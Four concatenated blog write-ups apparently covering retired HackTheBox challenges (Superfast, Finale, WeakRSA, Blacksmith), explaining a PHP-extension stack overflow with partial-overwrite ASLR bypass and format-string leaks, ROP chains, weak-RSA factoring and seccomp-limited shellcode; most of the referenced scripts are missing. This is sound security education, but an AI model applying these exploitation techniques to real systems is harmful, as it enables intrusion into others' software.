Hey folks. In this write-up, we're going to discuss the Superfast challenge in HackTheBox which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and perform a Return Oriented Programming (ROP) chain. The description of the challenge is:
We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we aquired from a temporarily exposed Git repository several months ago.Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners – can you find a way in?
I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.
Index
First looks
Finding primitives
Developing the ROP chain
Retrieving the flag
First looks
We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.
In /challenge/start.sh we can see that the challenge code gets bootstrapped using:
We can see that PHP loads php_logger.so as a binary extension for the webserver.
Finding primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.
Analysing index.php
The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.
One of the most important stages of exploit development is making a reproducing environment. Considering I want to run GDB on php_logger.so, I will run the challenge without Docker. I can run the PHP index.php with php -dextension=./php_logger.so -S 0.0.0.0:1337 in /challenge/ and I can send the HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123. We can see it succeeds because it returns a 200 status code.
Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.
Analyzing php_logger.so
We can find the source code of php_logger.so in /src/php_logger.c. Under which, we can find the source code of log_cmd() as well. We can see that log_cmd() retrieves function arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and – if the return is valid – appends to the /tmp/log file.
This function does look safe, so the vulnerability is in decrypt(input, size, key). This function checks if the size of the command is less than the size of the stack buffer. If it is more it will return, but if it is less it will memcpy() and XOR the buffer with the key.
We can see that sizeof(buffer) - size > 0 is used for the size check. However, sizeof() returns size_t, which is an unsigned integer on 32-bit and (in this case) an unsigned long on 64-bit. Since we are essentially doing ulong - int > int, we are using an unsigned value as a base value which means the value will wrap around. For example, in this case (uint)0 - (int)1 would become 2**32-1, instead of -1. A practical example would be the one below. The output of the program is 4294967295 1.
That means that sizeof(buffer) - size > 0) is always true, unless sizeof(buffer) == size. The result of that is a buffer overflow on the stack which we can leverage for a control flow hijacking primitive. Using Ghidra – the reverse engineering suite developed by the NSA – we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.
However, ASLR is enabled. That means that we cannot guess the library's memory address and hence cannot guess a return address for control flow hijacking. However, the smallest 12 bits of an address are not random,and thus can we reliably overwrite 12 bits of the return address. Say our normal return address would be 0x555555559a1e, in the next program, it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because it's the smallest 12 bits.
The reason only the first 12 bits of the address don't change, is because they point to 4096 bytes (2 ** 12 bits), which is the page size. The kernel – the manager of ASLR – can't work with addresses smaller than 4096 bytes.
Sadly, we can only write bundles of 8 bits (1 byte) at a time considering we're working with a char data type. This means we could only overwrite the 0x1e part of the addresses listed above, which narrows our possible return address area.
In Ghidra, we can figure out that the return address from decrypt() to log_cmd() (without ASLR) is equal 0x1014129. This means our scope of possible return addresses ranges from 0x1014100 to 0x10141ff.
The code in our return scope is the following. We can see that decrypt() is called, print_message() is called and a bunch of file IO functions. Internally, print_message() is a wrapper for php_printf(): the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.
However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.
When I try to fuzz using a script, I receive the following output:
However, when we remove the xor() function call, we can see that the end of the response is an address like b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. In order to identify where this leak happens, we can start a GDB server. We leak the address 0x7f651305f54041 and in GDB we can see with vmmap (in pwndbg) that this falls under 0x7f6513000000 0x7f6513200000 rw-p 200000 0 [anon_7f6513000]. Since this isn't executable it's irrelevant for the ROP chain.
Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf(). By supplying a payload like %08x %08x %08x %08x we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. Using the following payload, we can see the following leaks:
We have the needed primitives, so we can develop the ROP chain.
Developing the ROP chain
Now we can use pwntools' ELF classes in order to make automatic ROP-chains. Using pwntools' ELF class we can see that the execl function in the PLT section of the php binary. This means we can use it to spawn a shell. Our strategy is:
Leaking the address of the PHP binary and the php_logger.so in memory.
dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable
We can generate a ROP chain automatically with pwntools:
Which gives the following ROP chain:
As we can see, it does the following:
Retrieving the flag
I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.
Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.
Hey all. Today we're going to discuss the retired Finale challenge on HackTheBox. The description on HackTheBox is as follows:
It's the end of the season and we all know that the Spooktober Spirit will grant a souvenir to everyone and make their wish come true! Wish you the best for the upcoming year!
In this write-up, we will learn about the stack, ROP chains, and prioritizing attack vectors.
Spoiler alert: if you can't find the libc version, it's not a bug.
Summary
First looks
Finding vulnerability primitives
Developing the ROP chain
Retrieving the flag
Failed attempt
First looks
We are given an executable binary called finale. Upon performing a dynamic analysis, we are prompted for a password which means that we'll need to do a static analysis in order to proceed.
Running pwntools' checksec on finale gives us:
The fields mean:
Arch: the CPU architecture and instruction set (x86, ARM, MIPS, …)
Stack Canaries: protects against stack buffer overflow attacks
NX: No eXecute – write-able memory cannot be executed
PIE: Position Independable Executable – address randomization
For a more in-depth conclusion about checksec, please visit our previous blogpost about the Blacksmith challenge on Hack The Box. The logical conclusion is that we need to perform a stack-based buffer overflow (since Stack Canaries are disabled) leading to a Return-Oriented-Programming chain (since NX is enabled).
Finding vulnerability primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact.
Main() analysis
In order to analyze the binary, I opened it up in Ghidra, made by the NSA. The main() function prints 8 random bytes, asks us for a secret and calls finale().
As we can see, the secret for the binary is s34s0nf1n4l3b00 and finale() gets called after the correct secret has been entered.
Finale() analysis
As said, main() calls finale() after the secret has been entered. This function asks us for a wish for the next year.
We are given stack leak in the form of char* buf. Furthermore, there is a stack buffer overflow: the buffer length is 64 and we are writing 0x1000 (4096) bytes. In Ghidra we can see that the offset to the return address from the base of buf is 0x48 bytes.
GOT
Considering checksec said No PIE (0x400000), we can use the Procedural Linking Table (PLT) section of the binary. This means we could open a potential flag.txt using open(), read() and write().
Developing the ROP chain
Considering the protections in the binary listed by checksec state that No eXecute is enabled, we need to use Return Oriented Programming (ROP) chains. We want to do the following in the payload:
fd = open("flag.txt", 0);
n_read = read(3, buf, size); // 3 since fd == 3 can be expected
write(1, buf, n_read);
We have access to:
Binary/ELF
GOT and PLT (linked functions)
Functions (built-in functions)
Stack
Using print(*ELF('challenge/finale').plt.keys()), we can see that the following functions are available in the PLT sections:
Now we have the right functions and have access to the stack (for "flag.txt"), we need to need a way to pass function arguments. The x64 calling convention states that function arguments should be passed (in order) via RDI, RSI, RDX, RCX, R8, R9. This means that we need to control the RDI, RSI, and RDX registers via pop instructions (called gadgets) in the ROP-chain in order to pass 3 arguments to open(), read(), and write(). We can search for such gadgets using ropr: a blazing fast multithreaded ROP Gadget finder. Below is my search regex filter for ropr:
$ ropr -R '^pop (rdi|rsi|rdx); ret;' challenge/finale 0x004012d6: pop rdi; ret;
0x004012d8: pop rsi; ret;
Sadly, ropr can't find any gadgets for the RDX register. Even after trying many more search queries (like EDX and DX), I couldn't find any results. This means that we need to find a workaround for a high-enough RDX value for read(..., ..., size=RDX).
GNU Debugger (GDB)
In order to find out a way to get a high RDX value, I used GDB with the Pwndbg plug-in (please say /pwn-dbg/ and not /poʊndbæg/ as the repo proposes). To see the RDX value during runtime, we can use the GDB functions in pwntools:
As we can see, RDX is equal to 8 which means only 8 bytes of the flag get read and written to stdout. Since we need to read at least 32 bytes, we need to find a way of manipulating the RDX register. We could do this by:
Calling open("flag.txt", 0) using the PLT section in the ELF (which only executes the function and immediately returns after)
Manipulate RDX
Calling 0x4014e0 so we read() with the manipulated RDX and write() to stdout all at once.
As said, I tried finding gadgets which sadly did not work. After manually analyzing the binary I happened to see the following gadget:
As we can see, the EDX register is set to 0x54. This means we will read and write 84 bytes of the flag, which means it's more than enough and that we have completed the final part of the ROP chain:
In my failed attempt I tried to get remote code execution using leaked libc offsets, but it turned out that the libc version on the server was custom and it was intended to prevent this solution. I had to find out by asking the creator of the challenge.
The way we leak libc addresses is by calling puts() in the PLT section with the argument being a libc function linked in the GOT section. So, we need to call puts(const char *string); with argument string via the RDI register in AMD64. To control the RDI register, we use a ROP chain that pops RDI:
$ ropr -R 'pop rdi; ret;' challenge/finale
0x004012d6: pop rdi; ret; ==> Found 1 gadgets in 0.004 seconds
Now we can pop a GOT function address into RDI and call puts() to leak the function offset. Let's run the following script with the server as target to get their libc version:
When I enter those symbols and addresses into a libc-leak website like libc.rip, I cannot find a single libc version. That means that there's a custom libc version, which means we can't call system() since we don't have the address.
G'day everyone! In this write-up we are going to solve the retired WeakRSA challenge on Hack The Box. In order to do so however it is important you understand some of the basics. You will learn
Basic RSA
Decoding pem formats
How does RSA work?
RSA is an encryption algorithm which has been around since 1977. To use it you will need to chose two different large prime numbers these will be named p and q.
By multiplying p and q together you get your modulus named N. Then you can choose your exponent which we will name e. Now you are ready to encrypt your secret message. Using RSA our encryped message will be calculated like this : (message^e) mod N
In python3 it can be computed like this :
pow(message,e,N)
Decrypting RSA
Decrypting will be a little bit harder. To do so we first must find phi φ(N). We can do so like this : φ(N) = (p-1) * (q-1).
Remember that we need to know p and q to decrypt this is important. We are finally ready to calculate d, the modular inverse of e. This can be done by using the extended euclidean algorithm. You don't have to understand how (or why) it works but saying it will make you look smart. In python I use xgcd from the libnum library. d will be the first value the algorithm outputs.
d = xgcd(e,φN) [0]
The plaintext can then be calculated :
plaintext = pow(encrypted, d, N)
Solving the challenge
After downloading and extracting the zip we get a key encoded in the pub format. We can decode it using python or just by using an online tool which gives us the following data :
The Modulus being the public key N and the public exponent is our e
We know that the modulus is just p * q but it will take forever to factor such a large number. If only there was a quicker method. Wait a minute what if there are databases containing the factors of large number… That would be really helpful. After some searching I encountered this site. Let's try to input our N :
Looks like we found p and q. From here we can get the flag using python :
The lesson this challenge is trying to teach us is that p and q should be above 512 digits. This way the public key is less likely to be factorized, so p and q cant be found and your secret messages wont be able to be decrypted.
Hey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:
You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful weapon in the world! You can find him under the label "./flag.txt".
In this write-up, we will learn about seccomp, writing assembly, and performing syscalls.
Summary
First looks
Finding vulnerability primitives
Developing AMD64 (x86_64) assembly
Retrieving the flag
First looks
We are given the blacksmith executable binary. Upon running the binary, we are presented with a menu to trade items:
Usually, I start by checking the binary's security using pwntools' checksec. In this case, the security of blacksmith binary is:
The fields in checksec mean the following:
Arch: the CPU architecture and instruction set (x86, ARM, MIPS, …)
The logical conclusion is that we need to write a shellcode to the RWX memory to read out flag.txt (based on the challenge description).
Finding vulnerability primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork. An example of primitives working together is as follows:
an information leak primitive to leak an address
an arbitrary write primitive to control the execution flow
… which can work together by controlling the execution flow by writing a leaked address.
Main analysis
When I want to find vulnerability primitives, I open the binary in Ghidra, Ghidra is a reverse engineering tool developed by the NSA (yes, that NSA). I start off analyzing a binary at the main function. In this case, it looked like the following:
So, the main function does the following:
setup()
sec()
shield(), bow() or sword()
In addition to that, the main function uses canary tokens in variable __can_token. As you can see, if __can_token is not equal to the original value, it means that stack corruption has been detected and hence, __stack_chk_fail is called which exits the program.
The function setup removes the buffer for stdout and stdin, which is standard and hence not interesting. In contrast, the sec function is interesting.
Sec function
We can see that the sec function primarily creates an allow list using seccomp of the syscalls sys_read, sys_write, sys_open, and sys_exit. (Note that the naming convention for internal syscall functions is a sys_ prefix. When we say sys_read, we mean the syscall read.) By doing this, the developer of the program prevents us from executing our shell on the server since we would need to sys_execve("/bin/sh", NULL, NULL) for that. Because sys_execve is not on the allow list, we cannot use it. Remember this for later.
Shield analysis
Furthermore, we have the shield(), bow()orsword() calls in main(). The bow() and sword() functions crash the program before a user can give input, which means that's irrelevant. So basically, the vulnerability must be in shield().
What sticks out to me in this function is that we have user input and are calling a variable like a function using (*(code *)buf)();. The code (*(code *)buf)(); is equivalent to the ASM below:
The (*(code *)buf)(); function call executes the buf variable on the stack as if it was assembly. This means we can inject assembly into the program.
Developing AMD64 (x64_86) assembly
We have an arbitrary execution primitive so we need to write an assembly payload. The difficulty with this is that:
We have 63 bytes to work with:
We can only use sys_read, sys_write, sys_open and sys_exit:
We do not have a stack address (ASLR)
However, the challenge description told us that we need to read the flag.txt file. Hence, the strategy for this payload is opening flag.txt, reading flag.txt into a buffer, and writing the buffer to stdout.
To interact with those files, we need to utilize system calls ("syscalls"). Syscalls are essentially an ABI (binary API) with the Linux kernel which is like the god of the operating system. The kernel provides memory management, CPU scheduling, driver management, hardware IO, et cetera. If you want to learn more about the kernel, the book "Linux Kernel Development" by Robert Love is an excellent way to learn more about the kernel (I've read it).
I used a Linux x64 syscall table as a reference for using the syscalls. Essentially the code should do the following:
I came up with the following ASM:
Since we have only 63 bytes to work with, I had to be creative. In assembly, most bytes are allocated to constant values like mov rax, 2 since it will store an 8-byte 0x00000000 00000002 into the instruction. That means we can save a lot of bytes by reusing register values.
I eventually refactored the payload into 46 bytes:
Retrieving the flag
Now we have a steady payload, we need to send it to the application. I made the following script using pwntools: